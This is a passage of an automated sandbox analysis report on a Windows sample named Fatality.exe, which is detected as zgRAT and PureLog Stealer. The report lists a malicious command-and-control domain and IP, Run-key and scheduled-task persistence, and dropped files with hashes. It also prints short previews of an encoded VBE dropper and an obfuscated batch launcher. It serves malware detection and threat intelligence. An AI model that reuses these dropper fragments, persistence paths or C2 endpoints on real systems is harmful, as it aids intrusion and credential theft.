                              https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platWebCacheV01.dat.8.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchEoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3399676352.0000000013807000.00000004.00000800.00020000.00000000.sdmp, EluSdKNM7k.25.dr, fHEg1gEt1n.25.drfalse
                              • URL Reputation: safe
                              		unknown
                              http://373292cm.nyPEoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.00000000037B9000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://373292cm.nyashka.top/EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.0000000003532000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://aefd.nelreports.net/api/report?cat=bingrmsWebCacheV01.dat.8.drfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.enigmaprotector.com/Fatality.exe, 00000000.00000002.2133322697.0000000000982000.00000040.00000001.01000000.00000003.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameBridgeInto.exe, 00000006.00000002.2336699470.000000000373F000.00000004.00000800.00020000.00000000.sdmp, EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.0000000003532000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3399676352.0000000013807000.00000004.00000800.00020000.00000000.sdmp, EluSdKNM7k.25.dr, fHEg1gEt1n.25.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&WebCacheV01.dat.8.drfalse
                              • Avira URL Cloud: safe
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              80.211.144.156
                              		373292cm.nyashka.topItaly
                              		31034ARUBA-ASNITtrue

                              General Information

                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1498676
                              Start date and time:2024-08-25 15:42:10 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 9m 30s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:46
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:Fatality.exe
                              Detection:MAL
                              Classification:mal100.spre.troj.spyw.expl.evad.winEXE@53/59@1/1
                              EGA Information:
                              • Successful, ratio: 37.5%
                              HCA Information:Failed
                              Cookbook Comments:
                              • Found application associated with file extension: .exe

                              Warnings

                              • Exclude process from analysis (whitelisted): WinStore.App.exe, SIHClient.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target BridgeInto.exe, PID 4972 because it is empty
                              • Execution Graph export aborted for target BridgeInto.exe, PID 6904 because it is empty
                              • Execution Graph export aborted for target EoNanmDGxPEtougVgAjHLx.exe, PID 6928 because it is empty
                              • Execution Graph export aborted for target dllhost.exe, PID 4324 because it is empty
                              • Execution Graph export aborted for target dllhost.exe, PID 884 because it is empty
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                              • Report size getting too big, too many NtOpenFile calls found.
                              • Report size getting too big, too many NtOpenKey calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              09:43:01API Interceptor3x Sleep call for process: dllhost.exe modified
                              09:43:30API Interceptor284268x Sleep call for process: EoNanmDGxPEtougVgAjHLx.exe modified
                              15:43:22Task SchedulerRun new task: EoNanmDGxPEtougVgAjHLx path: "C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe"
                              15:43:22Task SchedulerRun new task: EoNanmDGxPEtougVgAjHLxE path: "C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe"
                              15:43:24Task SchedulerRun new task: BridgeInto path: "C:\Bridgemonitor\BridgeInto.exe"
                              15:43:24Task SchedulerRun new task: BridgeIntoB path: "C:\Bridgemonitor\BridgeInto.exe"
                              15:43:25Task SchedulerRun new task: dllhost path: "C:\Recovery\dllhost.exe"
                              15:43:25Task SchedulerRun new task: dllhostd path: "C:\Recovery\dllhost.exe"
                              15:43:25Task SchedulerRun new task: WinStore.App path: "C:\Users\All Users\ssh\WinStore.App.exe"
                              15:43:25Task SchedulerRun new task: WinStore.AppW path: "C:\Users\All Users\ssh\WinStore.App.exe"
                              15:43:25AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run EoNanmDGxPEtougVgAjHLx "C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe"
                              15:43:34AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run dllhost "C:\Recovery\dllhost.exe"
                              15:43:42AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WinStore.App "C:\Users\All Users\ssh\WinStore.App.exe"
                              15:43:50AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run BridgeInto "C:\Bridgemonitor\BridgeInto.exe"
                              15:43:58AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run EoNanmDGxPEtougVgAjHLx "C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe"
                              15:44:06AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run dllhost "C:\Recovery\dllhost.exe"
                              15:44:14AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WinStore.App "C:\Users\All Users\ssh\WinStore.App.exe"
                              15:44:22AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run BridgeInto "C:\Bridgemonitor\BridgeInto.exe"
                              15:44:30AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run EoNanmDGxPEtougVgAjHLx "C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe"
                              15:44:39AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run dllhost "C:\Recovery\dllhost.exe"
                              15:44:47AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run WinStore.App "C:\Users\All Users\ssh\WinStore.App.exe"
                              15:44:55AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run BridgeInto "C:\Bridgemonitor\BridgeInto.exe"
                              15:45:12AutostartRun: WinLogon Shell "C:\Program Files (x86)\microsoft.net\RedistList\EoNanmDGxPEtougVgAjHLx.exe"

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              80.211.144.156SpotifyStartupTask.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 973800cm.nyashsens.top/SecureBigloadServerDefaulttestdlepublic.php
                              SpotifyStartupTask2.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 572335cm.n9sh.top/CpuserverAsyncuniversal.php
                              BxV2vsnP6f.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • fizika.top/vmphp_geoUpdateProtectBasecdn.php
                              loader.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 782652cm.n9sh.top/providerImageProcessorGeneratorwp.php
                              MIDNIGHT.exeGet hashmaliciousDCRat, PureLog Stealer, XWorm, zgRATBrowse
                              • 782652cm.n9sh.top/providerImageProcessorGeneratorwp.php
                              b5d8kjYEBH.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 951499cm.nyashtech.top/sqlcentralUploads.php
                              cBEWDhqv1r.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 389075cm.n9sh.top/tolowProcessserverwindowsFlowertesttrackWpUploads.php
                              A6CuqcjdpG.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 951499cm.nyashtech.top/sqlcentralUploads.php
                              79khRJMBK9.exeGet hashmaliciousDCRatBrowse
                              • volki.top/CpuLongpolltrackDatalifeCdnuploads.php
                              EQ1VCbEIkT.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 951499cm.nyashtech.top/sqlcentralUploads.php

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              373292cm.nyashka.topjW5TA1J9Z1.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 80.211.144.156

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              ARUBA-ASNITSpotifyStartupTask.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 80.211.144.156
                              SpotifyStartupTask2.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 80.211.144.156
                              BxV2vsnP6f.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 80.211.144.156
                              loader.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 80.211.144.156
                              MIDNIGHT.exeGet hashmaliciousDCRat, PureLog Stealer, XWorm, zgRATBrowse
                              • 80.211.144.156
                              b5d8kjYEBH.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 80.211.144.156
                              cBEWDhqv1r.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 80.211.144.156
                              A6CuqcjdpG.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 80.211.144.156
                              79khRJMBK9.exeGet hashmaliciousDCRatBrowse
                              • 80.211.144.156
                              EQ1VCbEIkT.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 80.211.144.156

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              C:\Program Files\Microsoft Office 15\ClientX64\EoNanmDGxPEtougVgAjHLx.exejW5TA1J9Z1.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                C:\Bridgemonitor\BridgeInto.exejW5TA1J9Z1.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                  C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exejW5TA1J9Z1.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                    Created / dropped Files

                                    C:\Bridgemonitor\BridgeInto.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\Fatality.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1960448
                                    Entropy (8bit):7.550221219335871
                                    Encrypted:false
                                    SSDEEP:24576:cxr3a1dihASqBZKAcKEYq3nMMKUpgEVcUVaOrlfDPfZwaSiShgqdQ4oB1r/jjpvi:yadiFk/EOUkOZfLfpShg01sxXpkSvKm
                                    MD5:910284D590BDF27BBEEDBDE3F3A2A94D
                                    SHA1:6561EF1E4B2521AAF86F03AB791AC5ED6C4AF7D0
                                    SHA-256:6A397C6E1041AD55295C3FE2CF7F795DA853004C1A02E1D77C65F0DA86AD312E
                                    SHA-512:AA66C2DCA084FC179756D360F91609A433B2E704CC0E19AE05F25749C8C102EDF2808A92C088782643EF3EC75FA91768333820E30C3839247EC815D9BF8A8797
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Bridgemonitor\BridgeInto.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Bridgemonitor\BridgeInto.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Bridgemonitor\BridgeInto.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Bridgemonitor\BridgeInto.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 100%
                                    Joe Sandbox View:
                                    • Filename: jW5TA1J9Z1.exe, Detection: malicious, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.f................................. ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text...4.... ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......p.......................T........................................0..........(.... ........8........E....9...............84...*(.... ....8....(.... ....~....{....:....& ....8....(.... ....~....{l...:....& ....8........0.......... ........8........E....-...............9...8(...~....:)... ........8.......... ....8....r...ps....z*~....(O... .... .... ....s....~....(S....... ....~....{h...:n...& ....8c.......~....(W...~....([... ....?.... ....~....{....:-...& ....8".....(.

                                    C:\Bridgemonitor\Xaqgc4UniUxink9TEvtSaN4iIb.vbe

                                    Download File
                                    Process:C:\Users\user\Desktop\Fatality.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):218
                                    Entropy (8bit):5.814735904120153
                                    Encrypted:false
                                    SSDEEP:6:GUwqK+NkLzWbHOurFnBaORbM5nCkrks8UYKlgb9yCWs:GlMCzWLOuhBaORbQC0k9Kle9j1
                                    MD5:C357572C3DE6050797F8A3150D960522
                                    SHA1:E155A9DB0DA12E9E0CB217C9D679EF69B7906F02
                                    SHA-256:4CBA4AA1CA865472EC087DF4680B5098F215E0377B7B46AAB0223A585E956831
                                    SHA-512:6F35DA26DD64BC62673651316E946ECE4EDBABA308B2ECC6240BA719ED57A895CBE46668870DA0FE04BB29797C0395E4485BC93294D148A3AE8FFC4D5C4E8CA9
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    Preview:#@~^wQAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFX!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z$Mk9o+sW.rYKD&z.?TWnfVnP!l46D6X%;F.k$5}q6R8lDE~,!S~6lVdngjwAAA==^#~@.

                                    C:\Bridgemonitor\c2712dd26a2283

                                    Download File
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:ASCII text, with very long lines (372), with no line terminators
                                    Category:dropped
                                    Size (bytes):372
                                    Entropy (8bit):5.831570614297622
                                    Encrypted:false
                                    SSDEEP:6:2LyZdl8DiCElND2zQ82jrmS3YGKm4NEKCWogKzeINyEHN6mPYny9O1rbYNOGYHky:tB8DinlgzQ1XmS3YGDoggKSOLt6mPYy+
                                    MD5:BC64320441BF6A8A9D6DDFBDF9D3706F
                                    SHA1:00D01F4EDDFA7E852942E56ADEB782BE6A781E79
                                    SHA-256:3FB1C58F04FF79304B863B8B1D48578924627776164375AA0E148523B070A0C0
                                    SHA-512:042CB6B79BBA95436C5A8ADF17759A06E51B28BF36C88436FEAFACACFFFE9AEFC69F39C17EC6C3D98680BD682C1B48CFDFAA416D0501191ED495EECCC567DAEB
                                    Malicious:false
                                    Preview:UfCFwii2Is1KTEtcDf1D4V0RABlyaMEQFYesvfELjyVSczIlMkUab2c9ovFu6tc5olF5jAqhaqdG9iyK29m02nzN5fEAZTOzVan1uNCL3w9uYW9G7516HmDBv29E6qIHcouj46Zp7a6GnEyjf7DebRrtWmG2N7PNn2StmaLAfM9rp7XqDai8nopK7BMS0hbALtcuwE7EvC8PS9DZOZyxYQj9MHwlO3K8u9g5em48deNkqa287xDbtol5JcipSW0219eTdI4mezU4D8TwOxna0tOGXlvBEOqHnVtq6iez2a64Uq2LJwaesaBIvX51W2iPJMRrPnzpTyhZwUwrtk2SyLZNTk5inncA2qvHYK5g6uL32lValOIv

                                    C:\Bridgemonitor\zS0fKDlKT05bxtO58C1eiBYQ1f.bat

                                    Download File
                                    Process:C:\Users\user\Desktop\Fatality.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):76
                                    Entropy (8bit):4.903993757030197
                                    Encrypted:false
                                    SSDEEP:3:ZIUXvMKAjn34cKXKXACJl3pOCUn:ZIUXvYj31MKwunUn
                                    MD5:A7FA89383504A3BAD95435CD5195F415
                                    SHA1:EE31971BF35C38A6E37E8017CF221BDE55224DB9
                                    SHA-256:39258C93ECEA054B48C5713407938AA5358BE3BA254D935DE85A9533169BB7E4
                                    SHA-512:E97408A8F63ED08ED4DEDBBA7D75168D777A6444B7F019D47419500BDA4DB39DDA3AF11FD3FE872BDE6EF2EC551031C986F6438B576CF96BCEF7269FFBFF437A
                                    Malicious:false
                                    Preview:%QyWmIPI%%dcfjV%..%LgOXrjGHe%"C:\Bridgemonitor/BridgeInto.exe"%wCjQoMXCWgth%

                                    C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exe

                                    Download File
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1960448
                                    Entropy (8bit):7.550221219335871
                                    Encrypted:false
                                    SSDEEP:24576:cxr3a1dihASqBZKAcKEYq3nMMKUpgEVcUVaOrlfDPfZwaSiShgqdQ4oB1r/jjpvi:yadiFk/EOUkOZfLfpShg01sxXpkSvKm
                                    MD5:910284D590BDF27BBEEDBDE3F3A2A94D
                                    SHA1:6561EF1E4B2521AAF86F03AB791AC5ED6C4AF7D0
                                    SHA-256:6A397C6E1041AD55295C3FE2CF7F795DA853004C1A02E1D77C65F0DA86AD312E
                                    SHA-512:AA66C2DCA084FC179756D360F91609A433B2E704CC0E19AE05F25749C8C102EDF2808A92C088782643EF3EC75FA91768333820E30C3839247EC815D9BF8A8797
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 100%
                                    Joe Sandbox View:
                                    • Filename: jW5TA1J9Z1.exe, Detection: malicious, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.f................................. ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text...4.... ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......p.......................T........................................0..........(.... ........8........E....9...............84...*(.... ....8....(.... ....~....{....:....& ....8....(.... ....~....{l...:....& ....8........0.......... ........8........E....-...............9...8(...~....:)... ........8.......... ....8....r...ps....z*~....(O... .... .... ....s....~....(S....... ....~....{h...:n...& ....8c.......~....(W...~....([... ....?.... ....~....{....:-...& ....8".....(.

                                    C:\Program Files (x86)\Microsoft.NET\RedistList\c917822ecb0d66

                                    Download File
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:ASCII text, with very long lines (550), with no line terminators
                                    Category:dropped
                                    Size (bytes):550
                                    Entropy (8bit):5.874364787486939
                                    Encrypted:false
                                    SSDEEP:12:2hLnSJs3VhmFHzo2QGOQm+DAXAuddjx5YbdP:2hLhg3iQm+sXzx5wdP
                                    MD5:67F2A7283BB1C99CB08163F5658A5590
                                    SHA1:3D8D0EC6ED8AB1D4E4B10C79E93C98E6FEFF5A61
                                    SHA-256:1C42E0D99CAB66D77F02EEDFD21722DE4B71D935A8FE9BDB3485E7E6389B8D64
                                    SHA-512:35FAEDC9AEEE994CDD2E3A67B806CD1E58344302CE23CDEE2263BE55C1539596C7AA634E551AD797DA45587FC219A9C933AA537E71C34ACC6BB8DFDA34A6B961
                                    Malicious:false
                                    Preview:su0CS3q1VOJQg5trFUJ661jxGtCzOGS7Rb80cwQR9GsabuqZWoUCbil0KD6i10nO5M8F72PSE170JIVVDndkwPgszHqYzraIcefPwkbeYB8jlvrBrlfOXDbppPQ0M0dWbyXpnGjcL8LuR6HEZoqOMLvZCzjgUlRhimIwXCYlCCCY1qYtILahJOJPD8mygCIkqnMoyVqXQEMKJWhVa0YIKtXUc2sZZjF93crOet5weDRFB9GraQXqo9Z7P2M5mR7q9MQqoT1r4loHcSSdvB9JMYU4Cu8mh9KNGlFzsZCHZqvDVSe7ktJlSyek2Wo3UOJ5abA1NduV81tgnRjtPBCyzj5SHe6VvIwKg0m3SntG8ymaE77kx4nTMVF1gstsgYkzEiAwopbmR5zB6eNJhVi0ed7KuvXj3BkjOwWg7K6HdBCRgE4BfkLK0tUlkzB3R1sPUPxKHrMWZaXdbqnq0WET0atebu5HID0lTw6QQu3yYyvZW1K4MVC5xZZ4gSsXvENVkvJotXZGcP5BoTIkkB5xB5y4WCt8CgCTkZzlsf

                                    C:\Program Files (x86)\Microsoft\Edge\Application\CSC48DFCF3E932B4A62A92F13B5F615A1E.TMP

                                    Download File
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    File Type:MSVC .res
                                    Category:dropped
                                    Size (bytes):1168
                                    Entropy (8bit):4.448520842480604
                                    Encrypted:false
                                    SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                                    MD5:B5189FB271BE514BEC128E0D0809C04E
                                    SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                                    SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                                    SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                                    Malicious:false
                                    Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro

                                    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                    Download File
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):4608
                                    Entropy (8bit):3.952055895406107
                                    Encrypted:false
                                    SSDEEP:48:60mBthxZ8RxeOAkFJOcV4MKe28dSdavqBHbuulB+hnqXSfbNtm:q+xvxVx9nvkNTkZzNt
                                    MD5:C2508AC499BFFCF96118142555A728D5
                                    SHA1:64FD793DCBCACA02D82C406708A369AB477E2AED
                                    SHA-256:12933B0EFF24E660D06AB7B4D8DA96BBE1933A6399FDCDA288364F959E199709
                                    SHA-512:79AF619CBF7F37E4120012DD17B8ECA5C6BD03A4BB1A48A47501725BFEF960354FBC19F52E5A403EC608F362EB00FC0AC791F4D8676B94E80CF294F337F75A35
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.f.............................'... ...@....@.. ....................................@..................................'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..h.............................................................(....*.0..!.......r...pr...p.{....(....(....&..&..*....................0..........r...p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings........ ...#US.8.......#GUID...H... ...#Blob...........WU........%3................................................................

                                    C:\Program Files\Microsoft Office 15\ClientX64\EoNanmDGxPEtougVgAjHLx.exe

                                    Download File
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1960448
                                    Entropy (8bit):7.550221219335871
                                    Encrypted:false
                                    SSDEEP:24576:cxr3a1dihASqBZKAcKEYq3nMMKUpgEVcUVaOrlfDPfZwaSiShgqdQ4oB1r/jjpvi:yadiFk/EOUkOZfLfpShg01sxXpkSvKm
                                    MD5:910284D590BDF27BBEEDBDE3F3A2A94D
                                    SHA1:6561EF1E4B2521AAF86F03AB791AC5ED6C4AF7D0
                                    SHA-256:6A397C6E1041AD55295C3FE2CF7F795DA853004C1A02E1D77C65F0DA86AD312E
                                    SHA-512:AA66C2DCA084FC179756D360F91609A433B2E704CC0E19AE05F25749C8C102EDF2808A92C088782643EF3EC75FA91768333820E30C3839247EC815D9BF8A8797
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 100%
                                    Joe Sandbox View:
                                    • Filename: jW5TA1J9Z1.exe, Detection: malicious, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.f................................. ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text...4.... ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......p.......................T........................................0..........(.... ........8........E....9...............84...*(.... ....8....(.... ....~....{....:....& ....8....(.... ....~....{l...:....& ....8........0.......... ........8........E....-...............9...8(...~....:)... ........8.......... ....8....r...ps....z*~....(O... .... .... ....s....~....(S....... ....~....{h...:n...& ....8c.......~....(W...~....([... ....?.... ....~....{....:-...& ....8".....(.

                                    C:\Program Files\Microsoft Office 15\ClientX64\c917822ecb0d66

                                    Download File
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:ASCII text, with very long lines (331), with no line terminators
                                    Category:dropped
                                    Size (bytes):331
                                    Entropy (8bit):5.798944965418842
                                    Encrypted:false
                                    SSDEEP:6:moew5/Nofuc83BEnk/CVSTs30961QCku4rgun+z4jXxAjiDaG4:mWFHunSCVms3K61QCkxgun+z4jBAp
                                    MD5:38B0C90397496340C5C76F94B05873D7
                                    SHA1:6A2D46F5B5B5ECE290C7F5FC9B0D6BF44E66F8ED
                                    SHA-256:64636590BED985D39C69FDC3DC0FE5145FAA223F46E489719986FE2827D0A727
                                    SHA-512:7C4ADF11B04926A4FEC38304CCADBCCD6E0A995371EF3DA1DE1D0C8A1D2FD182CD4CED23FFBD3CB22DC803D82D5EE7847AA2A333F1B43F67C046F3E4B7FDE25E
                                    Malicious:false
                                    Preview:XbY7PadliL0ErDychKq0k6TxGgcM33N1ogBK9AxF2Q4aCbbVVzBELrtbHk0s7Qrp78aKBodgXl8UC2voFG1E1Iq7xkCYKEIliOcEBQUqWfqktZZPzLn0ZnxyScXblEVTcWvxZqnywKsWbFOXLxj9aRL5bnwi23FRJXHWolzIhyEP5bXMOAPyfW2LKzVw4E63FaNE81tj7bbmN69AQjT2nQwwe5LyPDNc2KJeOSOXQp1D5Q7O0VfUvEPzoajCq5U4N8uCwew8V6l7Zs1O8773h3rx4U0xtLqUV606f4bVjh8ycSa5jUEt7aWTQ6Ico8OKPQmc14tDfmU

                                    C:\ProgramData\ssh\WinStore.App.exe

                                    Download File
                                    Process:C:\Bridgemonitor\BridgeInto.exe
